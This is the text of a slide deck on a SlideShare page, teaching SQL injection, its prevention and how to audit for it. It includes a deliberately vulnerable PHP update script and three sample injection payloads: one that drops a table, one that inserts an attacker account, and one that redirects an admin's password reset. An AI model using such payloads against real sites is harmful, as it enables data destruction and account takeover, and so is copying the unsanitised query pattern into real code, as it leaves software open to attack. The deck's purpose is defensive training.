SlideShare uma empresa Scribd logo

Injection techniques conversys

Krishnendu Paul
Krishnendu Paul
Tecnologia
1 de 22
Baixar para ler offline
Injection Attacks Executing, Preventing, and Auditing
What is an Injection Attack? • Exploits weak application level security around the “system” type ID • Exploit allows the client, a.k.a. attacker, to “piggyback” code into a web page, and have the “system” ID execute it for them • Can both execute commands and insert / update / delete data Conversys Technologies PVT. Ltd.
What is the Danger? • Typically “system” IDs have “all access” rights to the database • When exploited, the attacker can do anything the “system” ID can • Utilizes no special equipment or advanced knowledge Conversys Technologies PVT. Ltd.
Industry Joint study by the US department of Commerce and Visa Ranked as one of the top 5 greatest data security vulnerabilities “SQL injection is a technique used to exploit Web-based applications by using client-supplied data in SQL queries. SQL injection attacks are caused primarily by applications that lack input validation checks. Recently, commercial shopping cart products have been the focus of attack by hackers who seek account information. PCI DSS Requirement 6.5 requires that Web-facing applications be developed in accordance with secure coding guidelines to guard against such attacks. “ Conversys Technologies PVT. Ltd.
Different Types of Code Injection • SQL Injection (Most prevalent) • LDAP Injection • XML Injection • Others...... * Flaw is not code specific, rather in the web application it is embedded in Conversys Technologies PVT. Ltd.
Structure of Web Based Systems • Application logic– Typically built with a scripting language (php, jsp, asp), a lightweight tool that interfaces with the data source and controls the behavior of the program • Data Source – Typically a database, but could also be a flat file, XML file, or another application • The interface between the application and data source is typically done with an embedded language. Embedded systems integrate one type of code into another (such as a php script executing SQL commands) Conversys Technologies PVT. Ltd.
How does it work? Review on Client-Server Architecture You (client) request a web page Server responds with the page, as displayed on the client computer Client enters data Server takes data, runs server side script, queries database, returns results Conversys Technologies PVT. Ltd.
What really happens when you search? Server has a prewritten SQL query stored in a script select item, picture, from ItemDB where description = ‘$client_input’; You input “american psycho 1st” Prewritten script is then executed by “system” as : select item, picture, from ItemDB where description = “american psycho 1st”; Please Note: You just used the “system” ID to execute a query that YOU wrote. In practice, most “system” ID’s have DBA level access, and are only restricted by the logic built into the application itself. Conversys Technologies PVT. Ltd.
Code Example <?PHP session_start(); header("Cache-control: private"); // IE 6 Fix. error_reporting(E_ALL); ?> <html> <body bgcolor = white> <?php $email = $_SESSION['email']; // Variable holding user’s email address $value = stripslashes($_POST['newdata']); // Variable holding data entered $fieldname = $_POST['type']; // Variable holding fieldname to update if ($_SESSION['access_rights'] == 1) { $db = mysql_connect("localhost", "system_id", “password"); // Connects to local DB mysql_select_db("payroll",$db); // selects database to query $query = "update data SET $fieldname='$value' WHERE email = '$email'"; // Prewritten Query $result = mysql_query($query,$db); // executes query echo "<META HTTP-EQUIV='Refresh' CONTENT='0; URL=return.php'>"; } ?> Conversys Technologies PVT. Ltd.
How can we exploit this? SQL Query Stored in Application: select item, picture, from ItemDB where description = ‘$client_input’ To commit a SQL Injection Attack, enter into the web site form: x‘;drop table ‘ItemDB The query executed by the “System” ID will now be: select item, picture, from ItemDB where description = ‘x‘;drop table ‘ItemDB’ The server just executed the stored query, and we just effectively destroyed the entire “ItemDB” database! Conversys Technologies PVT. Ltd.
Even More Fun… “Add A New User” Canned Query: SELECT email, passwd, login_id, full_name FROM members WHERE email = ‘$user_input’; SQL Attack: x'; INSERT INTO members ('email', 'passwd', 'login_id', 'full_name') VALUES (‘mike@pinch.com',‘mynewPW',‘pinch',‘Mike Pinch') System then Executes: SELECT email, passwd, login_id, full_name FROM members WHERE email = ‘x'; INSERT INTO members ('email', 'passwd', 'login_id', 'full_name') VALUES (‘mike@pinch.com',‘mynewPW',‘pinch',‘Mike Pinch'); I now have my very own account! Conversys Technologies PVT. Ltd.
One More for Good Measure “Forgot my Password” Canned Query: SELECT email, passwd, login_id, full_name FROM members WHERE email = ‘$UserInput’; SQL Attack: x'; UPDATE members SET email = ‘pinch@CLIENTX.com' WHERE email = ‘sysadmin@CLIENTX.com System then Executes: SELECT email, passwd, login_id, full_name FROM members WHERE email = x'; UPDATE members SET email = ‘pinch@CLIENTX.com' WHERE email = ‘sysadmin@CLIENTX.com Now just go to forgot my password, type pinch@CLIENTX.com, and the system will conveniently email me the system admin’s password! Conversys Technologies PVT. Ltd.
Prevention Conversys Technologies PVT. Ltd.
Error Message Masking • Bad • Good Conversys Technologies PVT. Ltd.
Error Masking • Blocks real error messages from being displayed to the client • Best Practice All specific errors messages are suppressed, either through using a generic error message, or blocking them altogether. Conversys Technologies PVT. Ltd.
How are Attacks Prevented? Sanitize all input including: • Data collected in Forms through browsers • Data collected in URL’s • Data collected through cookies • White/Black List • Mask Error Messages • Continuous Monitoring • New Technique: SQL Firewalls Conversys Technologies PVT. Ltd.
Prevalence of Attacks • Injection attacks are extremely powerful, almost always malicious, and nearly undetectable (until its too late) • Danger comes from simplicity – no special hardware or software is necessary. Just syntax knowledge and a browser! • In 2006, 14% of newly released commercial application and open source tools were vulnerable to SQL injection attacks. • A recent study of web sites not masking error messages returned a total of 10.3% Conversys Technologies PVT. Ltd.
Integrating into the Audit • Weak controls related to • Cobit Framework preventing injection attacks may – DS 5.3, Identity Management require nature, timing and extent • “All users (internal, external and temporary) of financial statement substantive and their activity on IT systems (business audit procedures. application, system operation, development and maintenance) should be uniquely identifiable. User access rights to systems and data should be in line with defined and • Assistance may be needed from documented business needs and job systems or data management requirements. User access rights are professionals to help identify if requested by user management, approved there were instances in which the by system owner and implemented by the control weaknesses were security-responsible person. User identities and access rights are maintained in a exploited. central repository. Cost-effective technical and procedural measures are deployed and kept current to establish • Cobit Framework (See excerpt) user identification, implement – DS 5.3, Identity Management authentication and enforce access rights.” Conversys Technologies PVT. Ltd.
What Systems are Vulnerable? • Predominantly internally developed applications • Web based client-server architecture • Any system where access is available via the web Conversys Technologies PVT. Ltd.
How do you determine if a system is vulnerable? • Inquire – Do you have database and server error messages masked? – Do you have a strategy to sanitize all user input to detect SQL injection attacks? – Walk me through how your system prevents SQL injection attempts, IE filtering input, limiting rights. • Observe – Ask client to generate an error message • Should either be generic or non-existent • Inspect – Request code sample showing filtering module logic • Should filter out suspicious characters such as “’,/;&%$” etc • View White/Black List • Attack and Penetration Testing Conversys Technologies PVT. Ltd.
Created and Presented by Krishnendu Paul Vice President – Technologies Conversys Technologies Pvt. Ltd. A Maxelor Company References http://www.sarbanes-oxley.com/section.php?level=1&pub_id=Sarbanes-Oxley http://usa.visa.com/download/business/accepting_visa/ops_risk_management/Top_5_Vulnerabilities _Bulletin_August2006.pdf - 2006 Visa USA "Applying an improved economic model to software buy-versus-build decisions", Higaki,Wesley. Hewlett-Packard Journal, August 1995. "Cobit 4.0", IT Governance Institute, 2005 Mitre Corporation, 2006 Conversys Technologies PVT. Ltd.
Thanks Conversys Technologies Pvt. Ltd. • Kolkata Office : 7, Bondel Road, Kolkata, West Bengal India – 700019 E-mail: info@conversys.in Telephone: +91-33-64602675 • Pune Office: #204, Casa Grande, Lane No. 8. Koregaon Park, Pune - 411 001 Telephone: +91 20 26052014 • US Office: 15 Corporate Place, Suite# 333 Piscataway, , NJ, 08854 USA Conversys Technologies PVT. Ltd.

Recomendados

Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentation
Ashwini Paranjpe
 
Finacle - Secure Coding Practices
Finacle - Secure Coding PracticesFinacle - Secure Coding Practices
Finacle - Secure Coding Practices
Infosys Finacle
 
Security Testing
Security TestingSecurity Testing
Security Testing
ISsoft
 
Securing Java in the Server Room
Securing Java in the Server RoomSecuring Java in the Server Room
Securing Java in the Server Room
Tim Ellison
 
Policy based access control
Policy based access controlPolicy based access control
Policy based access control
Elimity
 
Hitachi ID Suite 9.0 Features and Technology
Hitachi ID Suite 9.0 Features and TechnologyHitachi ID Suite 9.0 Features and Technology
Hitachi ID Suite 9.0 Features and Technology
Hitachi ID Systems, Inc.
 
Security testing
Security testingSecurity testing
Security testing
Khizra Sammad
 
OWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideOWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference Guide
Ludovic Petit
 

Recomendados

Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentation
Ashwini Paranjpe
 
Finacle - Secure Coding Practices
Finacle - Secure Coding PracticesFinacle - Secure Coding Practices
Finacle - Secure Coding Practices
Infosys Finacle
 
Security Testing
Security TestingSecurity Testing
Security Testing
ISsoft
 
Securing Java in the Server Room
Securing Java in the Server RoomSecuring Java in the Server Room
Securing Java in the Server Room
Tim Ellison
 
Policy based access control
Policy based access controlPolicy based access control
Policy based access control
Elimity
 
Hitachi ID Suite 9.0 Features and Technology
Hitachi ID Suite 9.0 Features and TechnologyHitachi ID Suite 9.0 Features and Technology
Hitachi ID Suite 9.0 Features and Technology
Hitachi ID Systems, Inc.
 
Security testing
Security testingSecurity testing
Security testing
Khizra Sammad
 
OWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideOWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference Guide
Ludovic Petit
 
Session2-Application Threat Modeling
Session2-Application Threat ModelingSession2-Application Threat Modeling
Session2-Application Threat Modeling
zakieh alizadeh
 
20111012 Sap Datasheet Site
20111012 Sap Datasheet Site20111012 Sap Datasheet Site
20111012 Sap Datasheet Site
Nicola_Milone
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)
mikemcbryde
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Security Innovation
 
IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant
Saravanan Purushothaman
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
Shreeraj Shah
 
Enhancing your mobile enterprise security with ibm worklight tips
Enhancing your mobile enterprise security with ibm worklight tipsEnhancing your mobile enterprise security with ibm worklight tips
Enhancing your mobile enterprise security with ibm worklight tips
bupbechanhgmail
 
Discussion Paper: Bugs Tracking
Discussion Paper: Bugs TrackingDiscussion Paper: Bugs Tracking
Discussion Paper: Bugs Tracking
Deny Prasetia
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
Sperasoft
 
Role based access control
Role based access controlRole based access control
Role based access control
Peter Edwards
 
Access Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource AuthorizationAccess Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource Authorization
Mark Niebergall
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
Mohammed Danish Amber
 
Common Sense Security Framework
Common Sense Security FrameworkCommon Sense Security Framework
Common Sense Security Framework
Jerod Brennen
 
An overview of access control
An overview of access controlAn overview of access control
An overview of access control
Elimity
 
Robert donald resume iam 1
Robert donald resume iam 1Robert donald resume iam 1
Robert donald resume iam 1
Robert Donald
 
Advanced applications-architecture-threats
Advanced applications-architecture-threatsAdvanced applications-architecture-threats
Advanced applications-architecture-threats
Blueinfy Solutions
 
Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)
Deny Prasetia
 
Security hole #5 application security science or quality assurance
Security hole #5 application security science or quality assuranceSecurity hole #5 application security science or quality assurance
Security hole #5 application security science or quality assurance
Tjylen Veselyj
 
Cloud Security vs Security in the Cloud
Cloud Security vs Security in the CloudCloud Security vs Security in the Cloud
Cloud Security vs Security in the Cloud
Tjylen Veselyj
 
Vulnerability manager v1.0
Vulnerability manager v1.0Vulnerability manager v1.0
Vulnerability manager v1.0
Finto Thomas , CISSP, TOGAF, CCSP, ITIL. JNCIS
 
Sql injection attack_analysis_py_vo
Sql injection attack_analysis_py_voSql injection attack_analysis_py_vo
Sql injection attack_analysis_py_vo
Jirka Vejrazka
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)
guest32e5cfe
 

Mais conteúdo relacionado

Mais procurados

20111012 Sap Datasheet Site
20111012 Sap Datasheet Site20111012 Sap Datasheet Site
20111012 Sap Datasheet Site
Nicola_Milone
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Security Innovation
 
IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant
Saravanan Purushothaman
 
Role based access control
Role based access controlRole based access control
Role based access control
Peter Edwards
 
Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)
Deny Prasetia
 
Security hole #5 application security science or quality assurance
Security hole #5 application security science or quality assuranceSecurity hole #5 application security science or quality assurance
Security hole #5 application security science or quality assurance
Tjylen Veselyj
 

Mais procurados (20)

Session2-Application Threat Modeling
Session2-Application Threat ModelingSession2-Application Threat Modeling
Session2-Application Threat Modeling
 
20111012 Sap Datasheet Site
20111012 Sap Datasheet Site20111012 Sap Datasheet Site
20111012 Sap Datasheet Site
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
 
IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
Enhancing your mobile enterprise security with ibm worklight tips
Enhancing your mobile enterprise security with ibm worklight tipsEnhancing your mobile enterprise security with ibm worklight tips
Enhancing your mobile enterprise security with ibm worklight tips
 
Discussion Paper: Bugs Tracking
Discussion Paper: Bugs TrackingDiscussion Paper: Bugs Tracking
Discussion Paper: Bugs Tracking
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
 
Role based access control
Role based access controlRole based access control
Role based access control
 
Access Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource AuthorizationAccess Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource Authorization
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Common Sense Security Framework
Common Sense Security FrameworkCommon Sense Security Framework
Common Sense Security Framework
 
An overview of access control
An overview of access controlAn overview of access control
An overview of access control
 
Robert donald resume iam 1
Robert donald resume iam 1Robert donald resume iam 1
Robert donald resume iam 1
 
Advanced applications-architecture-threats
Advanced applications-architecture-threatsAdvanced applications-architecture-threats
Advanced applications-architecture-threats
 
Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)
 
Security hole #5 application security science or quality assurance
Security hole #5 application security science or quality assuranceSecurity hole #5 application security science or quality assurance
Security hole #5 application security science or quality assurance
 
Cloud Security vs Security in the Cloud
Cloud Security vs Security in the CloudCloud Security vs Security in the Cloud
Cloud Security vs Security in the Cloud
 
Vulnerability manager v1.0
Vulnerability manager v1.0Vulnerability manager v1.0
Vulnerability manager v1.0
 

Destaque

Sql injection attack_analysis_py_vo
Sql injection attack_analysis_py_voSql injection attack_analysis_py_vo
Sql injection attack_analysis_py_vo
Jirka Vejrazka
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)
guest32e5cfe
 
Sql vulnerability advisory presentation
Sql vulnerability advisory presentationSql vulnerability advisory presentation
Sql vulnerability advisory presentation
Nicholas Davis
 
An Anatomy of a SQL Injection Attack
An Anatomy of a SQL Injection AttackAn Anatomy of a SQL Injection Attack
An Anatomy of a SQL Injection Attack
Imperva
 
Npc case studies
Npc case studiesNpc case studies
Npc case studies
Ron Young
 
IBM_EGIC_CorpSlide_150126
IBM_EGIC_CorpSlide_150126IBM_EGIC_CorpSlide_150126
IBM_EGIC_CorpSlide_150126
Amr Abou Zaid
 
What can Toastmasters do for you?
What can Toastmasters do for you?What can Toastmasters do for you?
What can Toastmasters do for you?
Sheeba Thukral
 

Destaque (20)

Sql injection attack_analysis_py_vo
Sql injection attack_analysis_py_voSql injection attack_analysis_py_vo
Sql injection attack_analysis_py_vo
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)
 
Web Security
Web SecurityWeb Security
Web Security
 
Intro to SQL Injection
Intro to SQL InjectionIntro to SQL Injection
Intro to SQL Injection
 
Sql vulnerability advisory presentation
Sql vulnerability advisory presentationSql vulnerability advisory presentation
Sql vulnerability advisory presentation
 
An Anatomy of a SQL Injection Attack
An Anatomy of a SQL Injection AttackAn Anatomy of a SQL Injection Attack
An Anatomy of a SQL Injection Attack
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
 
Npc case studies
Npc case studiesNpc case studies
Npc case studies
 
Scrum By muhammad shariq
Scrum By muhammad shariqScrum By muhammad shariq
Scrum By muhammad shariq
 
Направления совершенствования 97-ФЗ "Закон о блогерах"
Направления совершенствования 97-ФЗ "Закон о блогерах"Направления совершенствования 97-ФЗ "Закон о блогерах"
Направления совершенствования 97-ФЗ "Закон о блогерах"
 
Internal Quality Audit Training Islamabad 21 22 oct
Internal Quality Audit Training Islamabad 21 22 octInternal Quality Audit Training Islamabad 21 22 oct
Internal Quality Audit Training Islamabad 21 22 oct
 
Mgmt 557-2
Mgmt 557-2Mgmt 557-2
Mgmt 557-2
 
белянин психостилистика-02-типы-06-смешанные
белянин психостилистика-02-типы-06-смешанныебелянин психостилистика-02-типы-06-смешанные
белянин психостилистика-02-типы-06-смешанные
 
What's new in digital marketing technology and media - midyear 2014 update
What's new in digital marketing technology and media - midyear 2014 updateWhat's new in digital marketing technology and media - midyear 2014 update
What's new in digital marketing technology and media - midyear 2014 update
 
IBM_EGIC_CorpSlide_150126
IBM_EGIC_CorpSlide_150126IBM_EGIC_CorpSlide_150126
IBM_EGIC_CorpSlide_150126
 
What can Toastmasters do for you?
What can Toastmasters do for you?What can Toastmasters do for you?
What can Toastmasters do for you?
 
Testforslide
TestforslideTestforslide
Testforslide
 
REALTOR Client Retargeting
REALTOR Client RetargetingREALTOR Client Retargeting
REALTOR Client Retargeting
 
Sami: Intro, Vision and Action Plan for PMI Islamabad chapter
Sami: Intro, Vision and Action Plan for PMI Islamabad chapterSami: Intro, Vision and Action Plan for PMI Islamabad chapter
Sami: Intro, Vision and Action Plan for PMI Islamabad chapter
 
Gayab
GayabGayab
Gayab
 

Semelhante a Injection techniques conversys

Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
IBM Security
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
Security Innovation
 
owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWE
Arun Voleti
 
Securing Applications in the Cloud
Securing Applications in the CloudSecuring Applications in the Cloud
Securing Applications in the Cloud
Security Innovation
 
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
Security Innovation
 
Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...
Michael Hidalgo
 

Semelhante a Injection techniques conversys (20)

Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
 
owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWE
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
 
Cyber Security # Lec 5
Cyber Security # Lec 5Cyber Security # Lec 5
Cyber Security # Lec 5
 
Security testing
Security testingSecurity testing
Security testing
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan Koch
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan Koch
 
Pillars of great Azure Architecture
Pillars of great Azure ArchitecturePillars of great Azure Architecture
Pillars of great Azure Architecture
 
Securing Applications in the Cloud
Securing Applications in the CloudSecuring Applications in the Cloud
Securing Applications in the Cloud
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
 
OWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web DevelopersOWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web Developers
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
 
Ethical hacking
Ethical hacking Ethical hacking
Ethical hacking
 
Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...
 

Último

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
Delhi Call girls
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 

Último (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 

Injection techniques conversys

